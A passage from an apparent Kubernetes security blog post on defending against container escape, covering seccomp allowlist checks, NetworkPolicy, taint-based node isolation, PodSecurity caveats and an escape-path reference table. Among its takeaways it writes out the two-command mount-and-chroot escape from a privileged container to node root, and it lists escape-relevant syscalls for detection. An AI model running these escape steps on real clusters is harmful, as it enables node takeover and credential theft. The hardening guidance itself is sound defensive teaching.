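Allowlists of this size tend to drift as syscalls are added to keep applications working. A small check run in CI can confirm that none of the escape-relevant syscalls has crept back in. The sketch below is hypothetical (the function names and the ESCAPE_SYSCALLS list are assumptions for illustration) and handles only allowlist profiles, meaning those whose defaultAction is not SCMP_ACT_ALLOW.

```python
ESCAPE_SYSCALLS = ("mount", "umount2", "unshare", "setns", "pivot_root", "ptrace")


def allowed_syscalls(profile: dict) -> set[str]:
    """Return syscall names the profile allows unconditionally."""
    if profile.get("defaultAction") == "SCMP_ACT_ALLOW":
        raise ValueError("default-allow profile: use a denylist check instead")
    allowed = set()
    for rule in profile.get("syscalls", []):
        # Rules with an "args" filter allow the call only conditionally; skip them.
        if rule.get("action") == "SCMP_ACT_ALLOW" and not rule.get("args"):
            allowed.update(rule.get("names", []))
    return allowed


def escape_surface(profile: dict) -> list[str]:
    """List escape-relevant syscalls that the allowlist profile still permits."""
    allowed = allowed_syscalls(profile)
    return [name for name in ESCAPE_SYSCALLS if name in allowed]
```

Load the profile with json.load and fail the pipeline if escape_surface returns anything other than an empty list.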

Apply via pod spec:

spec:
  securityContext:
    seccompProfile:
      type: Localhost
      localhostProfile: "container-escape-block.json"
      # Profile must be in /var/lib/kubelet/seccomp/ on each node

# Distribute the seccomp profile to all nodes via DaemonSet
# Example using a DaemonSet that copies the profile file on startup
# (or use the built-in RuntimeDefault, which blocks roughly 40 to 50 of the 300+ syscalls)

# RuntimeDefault blocks, for containers without CAP_SYS_ADMIN: mount, unshare,
# clone with new-ns flags, add_key, keyctl, request_key, pivot_root.
# That is adequate for most workloads
spec:
  securityContext:
    seccompProfile:
      type: RuntimeDefault

Fix 4: Network Policy — Contain the Blast Radius After Escape

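A network policy that prevents pods in the namespace from reaching the Kubernetes API server limits what an attacker can do from inside the compromised pod. It still applies to a process that has only changed its filesystem view (the chroot in Path 1 stays in the pod's network namespace). It does not cover a process that has joined the host network namespace (nsenter -n, or hostNetwork: true), so treat it as a layer that slows lateral movement, not one that contains a full node compromise.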

# Deny all egress from application namespace to Kubernetes API server
# The API server typically runs on port 6443 on the control plane nodes
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: block-api-server-egress
  namespace: production
spec:
  podSelector: {}       # applies to all pods in namespace
  policyTypes:
    - Egress
  egress:
    # Allow DNS
    - ports:
        - protocol: UDP
          port: 53
    # Allow application traffic (customize per workload)
    - to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: production
    # Explicitly: no rule allowing egress to control plane CIDR
    # This is a deny-by-absence — egress to control plane falls through to default deny

# Also block pod-to-pod communication across namespaces
# to prevent an escaped pod from pivoting to other workloads
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: production
spec:
  podSelector: {}
  policyTypes:
    - Ingress
    - Egress
  # No ingress or egress rules = deny all
  # Add specific rules above this as needed

Fix 5: Node Isolation — Co-location Risk

An internet-facing pod and a pod with access to sensitive internal services should not share a node. If the internet-facing pod escapes, it reaches the node’s credentials and can pivot to anything else scheduled on that node.

# Use node selectors, taints, and tolerations to separate workload tiers

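# Taint sensitive nodes so only specific workloads schedule there,
# and label them so the nodeSelector below has something to match
kubectl taint nodes sensitive-node-1 workload-tier=sensitive:NoSchedule
kubectl label nodes sensitive-node-1 workload-tier=sensitive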

# Internet-facing pods: dedicated public-tier nodes
# Internal/privileged pods: dedicated sensitive-tier nodes

# Pod spec for internet-facing workload — only schedules on public nodes
spec:
  nodeSelector:
    workload-tier: public
  tolerations: []   # No toleration for sensitive node taint

# Pod spec for sensitive workload — only schedules on sensitive nodes
spec:
  nodeSelector:
    workload-tier: sensitive
  tolerations:
    - key: workload-tier
      operator: Equal
      value: sensitive
      effect: NoSchedule
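
The interaction between nodeSelector, taints, and tolerations is easy to get subtly wrong, so it can help to model it before rolling out. The following Python sketch approximates the two checks the scheduler applies here. It is a simplification that ignores affinity rules and PreferNoSchedule, and the function names are hypothetical.

```python
def tolerates(toleration: dict, taint: dict) -> bool:
    """Return True if a single toleration matches a single node taint."""
    effect = toleration.get("effect")
    if effect and effect != taint.get("effect"):
        return False  # an empty effect tolerates all effects
    key = toleration.get("key")
    if toleration.get("operator", "Equal") == "Exists":
        # An empty key with Exists tolerates every taint.
        return key is None or key == taint.get("key")
    same_value = toleration.get("value", "") == taint.get("value", "")
    return key == taint.get("key") and same_value


def can_schedule(pod_spec: dict, node_labels: dict, node_taints: list[dict]) -> bool:
    """Approximate the scheduler's nodeSelector and hard-taint checks."""
    selector = pod_spec.get("nodeSelector") or {}
    if any(node_labels.get(k) != v for k, v in selector.items()):
        return False
    tolerations = pod_spec.get("tolerations") or []
    for taint in node_taints:
        if taint.get("effect") not in ("NoSchedule", "NoExecute"):
            continue  # PreferNoSchedule is a soft preference
        if not any(tolerates(t, taint) for t in tolerations):
            return False
    return True
```

With the specs above, the internet-facing pod is rejected from a sensitive node twice over: its nodeSelector does not match the node label, and it carries no toleration for the taint.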

⚠ Production Gotchas

Legitimate workloads that require --privileged or hostPID. CNI plugins (Cilium, Calico, Flannel node agents), node-local-dns, monitoring agents (node exporters, eBPF-based agents like Tetragon itself), and storage drivers often need elevated access. Blanket enforcement of the Restricted profile without exceptions breaks these workloads. The approach: enforce Restricted on application namespaces; put infrastructure DaemonSets in a dedicated namespace with the Baseline policy where that suffices, or the Privileged policy for workloads that truly need privileged mode or host namespaces (Baseline forbids both), and compensate with Falco detection and node isolation.
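
The namespace split described above can be expressed with PodSecurity admission labels. A minimal sketch, assuming a hypothetical infra-daemonsets namespace for node agents; the audit and warn levels on that namespace are one possible choice for keeping visibility into how far each workload exceeds Baseline:

```yaml
apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    # Reject any pod that violates the Restricted profile
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/warn: restricted
---
apiVersion: v1
kind: Namespace
metadata:
  name: infra-daemonsets        # hypothetical namespace for CNI, storage, and eBPF agents
  labels:
    # Admit privileged pods here, but record and warn on anything beyond Baseline
    pod-security.kubernetes.io/enforce: privileged
    pod-security.kubernetes.io/audit: baseline
    pod-security.kubernetes.io/warn: baseline
```

Keeping the exempted namespace small, and restricting who can deploy into it through RBAC, limits how far the exception reaches.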

Seccomp Restricted blocks some monitoring agents. The Restricted profile requires every pod to run under a seccomp profile (RuntimeDefault or Localhost), and the runtime's default profile blocks several syscalls that APM agents and profiling tools use. Run strace -c -f ./your-agent to capture the syscall profile of your monitoring agent before enforcing Restricted. Common culprits, depending on the runtime version and the capabilities granted: perf_event_open (used by profilers), ptrace (used by some debuggers), bpf (used by eBPF-based tools). Add these to an allowlist seccomp profile rather than running the agent without any profile.
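
One way to attach such an allowlist is a Localhost seccomp profile, which the Restricted profile still permits. A minimal sketch, assuming a hypothetical profile file profiles/profiling-agent.json already distributed to every node, plus hypothetical pod, namespace, and image names:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: profiling-agent                 # hypothetical
  namespace: monitoring                 # hypothetical
spec:
  securityContext:
    seccompProfile:
      type: Localhost
      # Resolved relative to the kubelet seccomp directory
      # (/var/lib/kubelet/seccomp by default); the file name is an assumption
      localhostProfile: profiles/profiling-agent.json
  containers:
    - name: agent
      image: registry.example.com/profiling-agent:1.0   # hypothetical image
      securityContext:
        allowPrivilegeEscalation: false
```

Allowing a syscall in seccomp does not grant the Linux capability it may also require, so an agent that needs perf_event_open or bpf can still fail until its capability needs are reviewed separately.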

runc CVEs require node patching, not policy. PodSecurity admission and Falco rules protect against configuration-based escapes. A vulnerability in runc, containerd, or the Linux kernel itself bypasses policy-based controls entirely. Keep container runtime versions current; enable automatic node OS patching (Bottlerocket, Flatcar Linux) if your infrastructure allows it. Subscribe to CVE feeds for containerd (containerd/containerd) and runc (opencontainers/runc) specifically.

hostPath volumes are a partial equivalent to --privileged. A pod without --privileged but with a hostPath volume mounting /etc or /var/lib/kubelet can read node credentials without needing to mount a block device. Both the Baseline and Restricted profiles forbid hostPath volumes; only the Privileged policy allows them, so any namespace exempted to Privileged is where they can reappear. Audit for hostPath volumes separately from --privileged.

RuntimeClass with gVisor has syscall compatibility gaps. Applications that use io_uring, certain socket options, or kernel modules may not work under gVisor’s Sentry. Test in staging before deploying to production. The gVisor compatibility matrix is documented at gvisor.dev/docs/user_guide/compatibility. Separately, benchmark any application that does direct filesystem I/O at high volume (databases, high-throughput queues), as the overhead may be unacceptable even if the syscalls are supported.
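
A staging compatibility test can be as small as one RuntimeClass and one pod that opts into it. A minimal sketch, assuming the nodes' container runtime already has a runsc handler configured, with hypothetical pod, namespace, and image names:

```yaml
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: gvisor
handler: runsc                  # must match the handler name configured in the node's runtime
---
apiVersion: v1
kind: Pod
metadata:
  name: gvisor-compat-test      # hypothetical
  namespace: staging            # hypothetical
spec:
  runtimeClassName: gvisor      # run this pod under gVisor instead of the default runtime
  containers:
    - name: app
      image: registry.example.com/app:candidate   # hypothetical image under test
```

Running the application's normal integration and load tests against this pod surfaces unsupported syscalls and I/O overhead before the RuntimeClass reaches production.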

Quick Reference

Escape Path	Precondition	Detection Signal	Structural Fix
Privileged container → mount	`privileged: true`	Falco: mount syscall from container; Tetragon: sys_mount kprobe	PodSecurity Restricted enforce; seccomp blocks mount
hostPID + nsenter	`hostPID: true`	Falco: nsenter exec in container; audit log: pod creation with hostPID	PodSecurity Restricted (blocks hostPID)
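hostNetwork + IMDS	`hostNetwork: true`	CloudWatch: MetadataNoToken metric for IMDSv1 calls; CloudTrail: node role credentials used from an unexpected source	PodSecurity Restricted (blocks hostNetwork); enforce IMDSv2 (hop limit 1 only stops pods that are not on the host network)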
runc CVE (CVE-2019-5736)	Unpatched runc	Tetragon: vfs_write to /proc/self/exe	Patch runc/containerd; use RuntimeClass (gVisor)
hostPath volume mount	hostPath to sensitive path	Falco: sensitive host file access; PodSecurity audit	PodSecurity Baseline or Restricted (both block hostPath)
Escaped → API server	Node credential access	Audit log: API calls from node IP at unexpected time	Network policy blocking pod→API server egress; host-level policy for traffic from the node itself

Key Takeaways

Kubernetes container escape starts at the kernel: --privileged, hostPID, and hostNetwork remove Linux namespace and cgroup isolation — the Kubernetes API cannot prevent what happens inside a process that runs with those flags
Two commands from privileged container to root on the node: mount /dev/sda1 /mnt/host and chroot /mnt/host /bin/bash — this is not a sophisticated exploit, it is a default kernel behavior
eBPF detection (Falco, Tetragon) operates at the syscall level and catches the escape in progress; Kubernetes audit logs only catch the misconfigured pod creation, not the exploitation
PodSecurity Restricted enforcement at the namespace level is the structural fix for configuration-based escapes — it blocks --privileged, hostPID, hostNetwork, and hostPath volumes before a pod schedules
runc-class CVEs are independent of configuration — node-level patching and RuntimeClass (gVisor/Kata) isolation are the controls, not policy enforcement
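Network policy as a secondary layer limits lateral movement: a compromised workload should not be able to reach the API server, with or without stolen credentials. Standard NetworkPolicy governs pod traffic only, so traffic that originates in the node's own network namespace after an escape needs host-level controls from the CNI or the cloud firewall as well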

What’s Next

Container escape requires access to a running pod. But what if the attacker didn’t need to exploit anything at runtime — they shipped the attack as a dependency your build pipeline trusted? EP09 covers supply chain attacks from SolarWinds to XZ Utils: how a malicious package or a compromised build step becomes arbitrary code execution before the container ever runs, the detection patterns that are specific to supply chain compromise (dependency confusion, typosquatting, malicious maintainer takeovers), and the SLSA framework controls that create a verifiable chain of custody from source to deployed artifact.

Get EP09 in your inbox when it publishes → subscribe at linuxcent.com